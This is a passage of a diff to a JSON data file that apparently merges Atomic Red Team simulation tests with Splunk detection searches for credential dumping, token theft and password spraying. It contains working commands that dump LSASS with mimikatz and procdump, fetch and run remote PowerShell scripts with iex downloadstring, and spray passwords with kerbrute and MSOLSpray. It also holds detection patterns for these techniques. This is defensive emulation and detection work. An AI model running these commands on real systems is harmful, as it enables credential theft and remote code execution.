2> nul\n", "name": "command_prompt", "elevation_required": true @@ -343207,8 +346115,8 @@ "dependencies": [ { "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", - "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path #{mimikatz_exe} | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" + "prereq_command": "if (Test-Path \"#{mimikatz_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path \"#{mimikatz_exe}\" | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" }, { "description": "Lsass dump must exist at specified location (#{input_file})\n", @@ -343217,7 +346125,7 @@ } ], "executor": { - "command": "#{mimikatz_exe} \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", + "command": "\"#{mimikatz_exe}\" \"sekurlsa::minidump #{input_file}\" \"sekurlsa::logonpasswords full\" exit\n", "name": "command_prompt", "elevation_required": true } @@ -343283,19 +346191,19 @@ "procdump_exe": { "description": "Path of Procdump executable", "type": "path", - "default": "PathToAtomicsFolder..\\ExternalPayloads\\procdump.exe" + "default": "PathToAtomicsFolder\\..\\ExternalPayloads\\procdump.exe" } }, "dependency_executor_name": "powershell", "dependencies": [ { "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", - "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\\Procdump.exe #{procdump_exe} -Force\n" + "prereq_command": "if (Test-Path \"#{procdump_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{procdump_exe}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\\Procdump.exe\" \"#{procdump_exe}\" -Force\n" } ], "executor": { - "command": "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n", + "command": "\"#{procdump_exe}\" -accepteula -mm lsass.exe #{output_file}\n", "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", "name": "command_prompt", "elevation_required": true @@ -344303,7 +347211,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "$process_name$ was identified on endpoint $Computer$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager.", + "message": "$process_name$ was identified on endpoint $dest$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -344313,32 +347221,11 @@ ], "observable": [ { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "TargetFilename", - "type": "File Name", - "role": [ - "Victim" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 80, @@ -344423,7 +347310,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The $source_image$ has attempted access to read $TargetImage$ was identified on endpoint $Computer$, this is indicative of credential dumping and should be investigated.", + "message": "The $source_image$ has attempted access to read $TargetImage$ was identified on endpoint $dest$, this is indicative of credential dumping and should be investigated.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -344433,14 +347320,7 @@ ], "observable": [ { - "name": "source_image", - "type": "Other", - "role": [ - "Victim" - ] - }, - { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -344522,7 +347402,7 @@ { "name": "Dump LSASS via comsvcs DLL", "description": "The following analytic detects the behavior of dumping credentials from memory, a tactic commonly used by adversaries. Specifically, it targets the exploitation of the Local Security Authority Subsystem Service (LSASS) in Windows, which manages system-level authentication. Threat actors can use the comsvcs.dll to exploit this process and obtain valuable credentials. The analytic identifies instances where the rundll32 process is used in conjunction with the comsvcs.dll and MiniDump, indicating potential LSASS dumping attempts. This tactic is often part of more extensive attack campaigns and is associated with numerous threat groups. Identifying this behavior is crucial for security operations center (SOC) analysts, as credential theft can lead to broader system compromise, persistence, lateral movement, and escalated privileges. It is important to note that no legitimate use of this technique has been identified so far. The impact of the attack, if a true positive is found, can be severe. Attackers can use the stolen credentials to access sensitive information or systems, leading to data theft, ransomware attacks, or other damaging outcomes. To implement this analytic, ensure that logs with process information are ingested from your endpoints. However, be aware of potential false positives, as legitimate uses of the LSASS process may cause benign activities to be flagged. Upon triage, review the processes involved in the LSASS dumping attempt, capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. By identifying and mitigating LSASS exploitation attempts early on, SOC analysts can better protect their organization's assets and prevent potential breaches.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`", "tags": { "name": "Dump LSASS via comsvcs DLL", "analytic_story": [ @@ -344535,7 +347415,8 @@ "Living Off The Land", "Suspicious Rundll32 Activity", "Data Destruction", - "Volt Typhoon" + "Volt Typhoon", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -344650,7 +347531,7 @@ { "name": "Dump LSASS via procdump", "description": "Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage. -mm will produce a mini dump file and -ma will write a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (original_file_name=procdump) of the PE or look for procdump64.exe. Modify the query as needed.\\\nDuring triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been ran, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross process (injection) into lsass.exe.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`", "tags": { "name": "Dump LSASS via procdump", "analytic_story": [ @@ -344800,7 +347681,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -344976,7 +347857,7 @@ { "name": "Windows Non-System Account Targeting Lsass", "description": "The following analytic identifies non SYSTEM accounts requesting access to lsass.exe. This behavior may be related to credential dumping or applications requiring access to credentials. Triaging this event will require understanding the GrantedAccess from the SourceImage. In addition, whether the account is privileged or not. Review the process requesting permissions and review parallel processes.", - "search": "`sysmon` EventCode=10 TargetImage=*lsass.exe NOT (SourceUser=\"NT AUTHORITY\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, GrantedAccess, SourceImage, SourceProcessId, SourceUser, TargetUser | rename Computer as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_non_system_account_targeting_lsass_filter`", + "search": "`sysmon` EventCode=10 TargetImage=*lsass.exe NOT (SourceUser=\"NT AUTHORITY\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, parent_process_path ,parent_process_id, TargetImage, GrantedAccess, SourceUser, TargetUser | rename TargetUser as user | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `windows_non_system_account_targeting_lsass_filter`", "tags": { "name": "Windows Non-System Account Targeting Lsass", "analytic_story": [ @@ -344989,7 +347870,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A process, $SourceImage$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", + "message": "A process, $parent_process_path$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -345013,17 +347894,10 @@ ] }, { - "name": "ImageLoaded", - "type": "Process", - "role": [ - "Other" - ] - }, - { - "name": "SourceImage", + "name": "parent_process_path", "type": "Process", "role": [ - "Child Process" + "Parent Process" ] } ], @@ -345095,7 +347969,7 @@ { "name": "Windows Possible Credential Dumping", "description": "The following analytic is an enhanced version of two previous analytics that identifies common GrantedAccess permission requests and CallTrace DLLs in order to detect credential dumping. \\\nGrantedAccess is the requested permissions by the SourceImage into the TargetImage. \\\nCallTrace Stack trace of where open process is called. Included is the DLL and the relative virtual address of the functions in the call stack right before the open process call. \\\ndbgcore.dll or dbghelp.dll are two core Windows debug DLLs that have minidump functions which provide a way for applications to produce crashdump files that contain a useful subset of the entire process context. \\\nThe idea behind using ntdll.dll is to blend in by using native api of ntdll.dll. For example in sekurlsa module there are many ntdll exported api, like RtlCopyMemory, used to execute this module which is related to lsass dumping.", - "search": "`sysmon` EventCode=10 TargetImage=*\\\\lsass.exe GrantedAccess IN (\"0x01000\", \"0x1010\", \"0x1038\", \"0x40\", \"0x1400\", \"0x1fffff\", \"0x1410\", \"0x143a\", \"0x1438\", \"0x1000\") CallTrace IN (\"*dbgcore.dll*\", \"*dbghelp.dll*\", \"*ntdll.dll*\", \"*kernelbase.dll*\", \"*kernel32.dll*\") NOT SourceUser IN (\"NT AUTHORITY\\\\SYSTEM\", \"NT AUTHORITY\\\\NETWORK SERVICE\")| stats count min(_time) as firstTime max(_time) as lastTime by, Computer, SourceImage, GrantedAccess, TargetImage, SourceProcessId, SourceUser, TargetUser | rename Computer as dest | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | `windows_possible_credential_dumping_filter`", + "search": "`sysmon` EventCode=10 TargetImage=*\\\\lsass.exe granted_access IN (\"0x01000\", \"0x1010\", \"0x1038\", \"0x40\", \"0x1400\", \"0x1fffff\", \"0x1410\", \"0x143a\", \"0x1438\", \"0x1000\") CallTrace IN (\"*dbgcore.dll*\", \"*dbghelp.dll*\", \"*ntdll.dll*\", \"*kernelbase.dll*\", \"*kernel32.dll*\") NOT SourceUser IN (\"NT AUTHORITY\\\\SYSTEM\", \"NT AUTHORITY\\\\NETWORK SERVICE\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, GrantedAccess, TargetImage, SourceProcessId, SourceUser, TargetUser | rename SourceUser as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_possible_credential_dumping_filter`", "tags": { "name": "Windows Possible Credential Dumping", "analytic_story": [ @@ -345112,7 +347986,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "A process, $SourceImage$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details.", + "message": "A process, $SourceImage$, has loaded $TargetImage$ that are typically related to credential dumping on $dest$. Review for further details.", "mitre_attack_id": [ "T1003.001", "T1003" @@ -345135,13 +348009,6 @@ "Victim" ] }, - { - "name": "ImageLoaded", - "type": "Process", - "role": [ - "Other" - ] - }, { "name": "SourceImage", "type": "Process", @@ -347657,7 +350524,7 @@ }, { "name": "Splunk risky Command Abuse disclosed february 2023", - "description": "In February 2023, Splunk disclosed several vulnerabilities affecting Splunk Enterprise commands deemed risky. The following hunting search includes the following commands and versions. Command 'createrss' (versions 8.1.13, 8.2.10), pivot (8.1.13,8.2.10,9.0.4), display.page.search.patterns.sensitivity(versions below 8.1.13,8.2.10,9.0.4), search_listener, map, collect (8.1.13,8.2.10,9.0.4). For more information please review Splunk Vulnerabilities Disclosure, February 2023. Link can be found in reference.", + "description": "This search looks for a variety of high-risk commands throughout a number of different Splunk Vulnerability Disclosures. Please refer to the following URL for additional information on these disclosures - https://advisory.splunk.com", "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Splunk_Audit.Search_Activity where Search_Activity.search_type=adhoc Search_Activity.user!=splunk-system-user by Search_Activity.search Search_Activity.info Search_Activity.total_run_time Search_Activity.user Search_Activity.search_type | `drop_dm_object_name(Search_Activity)` | lookup splunk_risky_command splunk_risky_command as search output splunk_risky_command description vulnerable_versions CVE other_metadata | where splunk_risky_command != \"false\" | `splunk_risky_command_abuse_disclosed_february_2023_filter`", "tags": { "name": "Splunk risky Command Abuse disclosed february 2023", @@ -347713,7 +350580,7 @@ { "name": "Allow Operation with Consent Admin", "description": "This analytic identifies a potential privilege escalation attempt to perform malicious task. This registry modification is designed to allow the `Consent Admin` to perform an operation that requires elevation without consent or credentials. We also found this in some attacker to gain privilege escalation to the compromise machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name = ConsentPromptBehaviorAdmin Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_operation_with_consent_admin_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name = ConsentPromptBehaviorAdmin Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_operation_with_consent_admin_filter`", "tags": { "name": "Allow Operation with Consent Admin", "analytic_story": [ @@ -347770,7 +350637,7 @@ { "name": "Disable UAC Remote Restriction", "description": "This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name=\"LocalAccountTokenFilterPolicy\" Registry.registry_value_data=\"0x00000001\" ) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentVersion\\\\Policies\\\\System*\" Registry.registry_value_name=\"LocalAccountTokenFilterPolicy\" Registry.registry_value_data=\"0x00000001\" ) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter`", "tags": { "name": "Disable UAC Remote Restriction", "analytic_story": [ @@ -347785,7 +350652,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1548.002", "T1548" @@ -351294,7 +354161,7 @@ } ], "command_list": [ - "Set-ExecutionPolicy -Scope Process Bypass -Force\n$owners = @{}\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}\nGet-Process | Select ProcessName,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}}\n$PathToAtomicsFolder\\T1134.002\\src\\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,\"cmd.exe\")\n", + "Set-ExecutionPolicy -Scope Process Bypass -Force\n$owners = @{}\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}\nGet-Process | Select ProcessName,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}}\n& \"$PathToAtomicsFolder\\T1134.002\\src\\GetToken.ps1\"; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,\"cmd.exe\")\n", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem" ], "commands": [], @@ -351315,7 +354182,7 @@ "windows" ], "executor": { - "command": "Set-ExecutionPolicy -Scope Process Bypass -Force\n$owners = @{}\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}\nGet-Process | Select ProcessName,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}}\n$PathToAtomicsFolder\\T1134.002\\src\\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,\"cmd.exe\")\n", + "command": "Set-ExecutionPolicy -Scope Process Bypass -Force\n$owners = @{}\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}\nGet-Process | Select ProcessName,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}}\n& \"$PathToAtomicsFolder\\T1134.002\\src\\GetToken.ps1\"; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,\"cmd.exe\")\n", "name": "powershell", "elevation_required": true } @@ -356205,7 +359072,7 @@ "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". \" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"Spring2020\" $env:Temp\\usersdpsLight.txt\n", "import-module \"\\..\\ExternalPayloads\\MSOLSpray.ps1\"\nInvoke-MSOLSpray -UserList \"$env:temp\\T1110.003UserList.txt\" -Password \"P@ssword1\"\n", - "cd \\..\\ExternalPayloads\n.\\kerbrute.exe passwordspray --dc $ENV:userdnsdomain -d $ENV:userdomain \\..\\ExternalPayloads\\passwordspray.txt password132 \n", + "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe passwordspray --dc $ENV:userdnsdomain -d $ENV:userdomain \"\\..\\ExternalPayloads\\passwordspray.txt\" password132 \n", "cd /tmp\ngit clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git\ncd /tmp/GoAWSConsoleSpray\ngo run main.go GoAWSConsoleSpray -a XXXXXXXX -u /T1110.003/src/aws_users.txt -p /T1110.003/src/aws_passwords.txt\n" ], "commands": [], @@ -356236,7 +359103,7 @@ { "description": "List of domain users to password spray must exits at %temp%\\users.txt\n", "prereq_command": "if not exist %temp%\\users.txt (exit /b 1)\n", - "get_prereq_command": "PathToAtomicsFolder\\T1110.003\\src\\parse_net_users.bat\n" + "get_prereq_command": "\"PathToAtomicsFolder\\T1110.003\\src\\parse_net_users.bat\"\n" } ], "executor": { @@ -356400,7 +359267,7 @@ "dependencies": [ { "description": "MSOLSpray module must exist in PathToAtomicsFolder\\..\\ExternalPayloads.\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\MSOLSpray.ps1){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\MSOLSpray.ps1\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\MSOLSpray.ps1\"\n" } ], @@ -356433,19 +359300,19 @@ "dependencies": [ { "description": "kerbrute.exe must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe){exit 0} else {exit 1}\n", + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"){exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\kerbrute.exe\"\n" }, { "description": "passwordspray.txt must exist in PathToAtomicsFolder\\..\\ExternalPayloads\n", - "prereq_command": "if (test-path PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt){exit 0} else {exit 1}\n", - "get_prereq_command": "invoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt\"\n" + "prereq_command": "if (test-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\ninvoke-webrequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt\"\n" } ], "executor": { "name": "powershell", "elevation_required": false, - "command": "cd PathToAtomicsFolder\\..\\ExternalPayloads\n.\\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt password132 \n" + "command": "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} \"PathToAtomicsFolder\\..\\ExternalPayloads\\passwordspray.txt\" password132 \n" } }, { @@ -357304,7 +360171,7 @@ { "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low.", - "search": " `azuread` body.category=UserRiskEvents body.properties.riskLevel=high | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", + "search": " `azuread` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", "tags": { "name": "Azure Active Directory High Risk Sign-in", "analytic_story": [ @@ -357318,7 +360185,7 @@ "Weaponization", "Exploitation" ], - "message": "A high risk event was identified by Identify Protection for user $body.properties.userPrincipalName$", + "message": "A high risk event was identified by Identify Protection for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -357408,7 +360275,7 @@ { "name": "Azure AD High Number Of Failed Authentications From Ip", "description": "The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 5 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection.", - "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) as userPrincipalName by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD High Number Of Failed Authentications From Ip", "analytic_story": [ @@ -357504,7 +360371,7 @@ { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nAzure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed.", - "search": " `azuread` body.category= SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", "tags": { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "analytic_story": [ @@ -357518,7 +360385,7 @@ "Weaponization", "Exploitation" ], - "message": "Source Ip $body.properties.ipAddress$ failed to authenticate with 30 users within 5 minutes.", + "message": "Source Ip $ipAddress$ failed to authenticate with 30 users within 5 minutes.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -357619,7 +360486,7 @@ { "name": "Azure AD Successful Authentication From Different Ips", "description": "The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.", - "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", + "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) as ipAddress values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", "tags": { "name": "Azure AD Successful Authentication From Different Ips", "analytic_story": [ @@ -357715,7 +360582,7 @@ { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an 